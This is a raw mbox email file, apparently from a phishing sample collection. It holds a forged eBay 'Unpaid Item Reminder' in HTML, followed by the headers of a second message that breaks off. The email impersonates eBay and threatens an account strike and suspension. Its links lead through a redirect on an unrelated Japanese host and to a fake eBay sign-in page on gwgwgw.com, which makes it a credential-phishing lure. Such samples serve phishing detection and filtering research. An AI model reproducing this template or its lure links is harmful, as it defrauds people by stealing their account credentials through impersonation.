From: eBay <aw-confirm@ebay.com>
Reply-To: 
MIME-Version: 1.0
Content-Type: text/html
Content-Transfer-Encoding: 8bit
X-Keywords:                  
X-UID: 295067
Status: O
Content-Length: 3031
Lines: 30


<TABLE cellSpacing=0 cellPadding=0 width=600>
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" width=600>
<TABLE cellSpacing=0 cellPadding=0 width=600 border=0 xmlns:x="urn:schemas-microsoft-com:xslt">
<TBODY>
<TR>
<TD style="WORD-WRAP: break-word" width=600>
<TABLE cellSpacing=0 cellPadding=2 width="100%" bgColor=#eeeef8 border=0>
<TBODY>
<TR>
<TD width=2><FONT face=verdana color=#003399 size=2><IMG src="http://pics.ebaystatic.com/aw/pics/spacer.gif" width=2></FONT></TD>
<TD><FONT face=verdana size=2><STRONG>eBay Unpaid Item Reminder: #4604409636</STRONG></FONT></TD>
<TD vAlign=center><A href="http://www.ebay.com/" target=_blank><FONT face=verdana size=2><IMG src="http://pics.ebaystatic.com/aw/pics/email/eBayLogo.gif" align=right border=0></FONT></A></TD></TR>
<TR bgColor=#9999cc height=2>
<TD colSpan=3><FONT face=verdana size=2></FONT></TD></TR></TBODY></TABLE></TD></TR>
<TR>
<TD>
<TABLE style="FONT-SIZE: x-small; FONT-FAMILY: arial, sans-serif" cellSpacing=0 cellPadding=0 width="94%" align=center border=0>
<TBODY>
<TR>
<TD><BR><FONT face=verdana>Dear Member, <BR><BR><BR></FONT></TD></TR>
<TR>
<TD><FONT face=verdana><FONT face=verdana>heartnsoulauctions has informed us that they have not yet received your payment for the following item: Harley Davidson Aftermarket Silver Face Gauge Kit(#4604409636) <BR></FONT><BR>No action is being taken against your account at this time. However, it is important to remember that when you bid on or buy an item you are agreeing to a contract between you and the seller. If the situation isn't resolved within 7 days of this reminder, you may receive an Unpaid Item strike under eBay's </FONT><A href="http://dns1.marukaseiki.co.jp/~nakano/redirect.html?ws/eBayISAPI.dll/?ResolveDispute&DisputeId=61693515?ViewItem&item=7165006036&ssPageName=STRK:MEMM:IID?SignIn&pUserId=&co_partnerId=2&siteid=0&pageType=-1&pa1=&i1=-1&UsingSSL=1&bshowgif=0&favoritenav=&ru=http://www.ebay.com&pp=&errmsg=8" target=_blank onfiltered="return ShowLinkWarning()"><FONT color=#003399><FONT face=! verdana>Unpaid Item Policy</FO! NT></FONT></A><FONT face=verdana>. <!
BR><BR></FONT><A href="http://www.gwgwgw.com/icons/signin.ebay.com/secure/index.html" target=_blank onfiltered="return ShowLinkWarning()"><FONT face=verdana><IMG alt="Respond to this notification" src="http://pics.ebaystatic.com/aw/pics//email/btnRespond.gif" border=0></FONT></A><FONT face=verdana>. <BR><BR></FONT><FONT face=verdana><FONT color=#000000>If you don't respond by May-09-2006 you may receive an Unpaid Item strike.<BR><BR><STRONG><FONT face=Arial>Remember, repeated Unpaid Item strikes may result in your suspension from eBay.</FONT></STRONG><BR><BR>Most Unpaid Item disputes can be resolved through direct communicatio! n between the buyer and seller, and we encourage you to work with your trading partner to reach a resolution. <BR></FONT><BR>! ! </FONT></FONT></TD></TR>
<TR>
<TD><FONT face=verdana>Regards, <BR><BR>eBay </FONT></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE></TD></TR></TBODY></TABLE>



From service@ebay.com  Wed May  3 04:03:30 2006
Return-Path: <service@ebay.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP
	id 3EC6CCAB59C; Wed,  3 May 2006 04:03:30 -0400 (EDT)
Received: from 192.168.1.200 (69-0-28-190.adsl.snet.net [69.0.28.190])
	by mail1.example.com (Postfix) with SMTP id A40806CCE5E;
	Tue,  2 May 2006 23:17:09 -0400 (EDT)
Received: from 244.203.241.55 by ; Wed, 03 May 2006 11:54:45 +0300
Message-ID: <ATBYSJKVDNPFIJNFDIZYVRFYJ@msn.com>
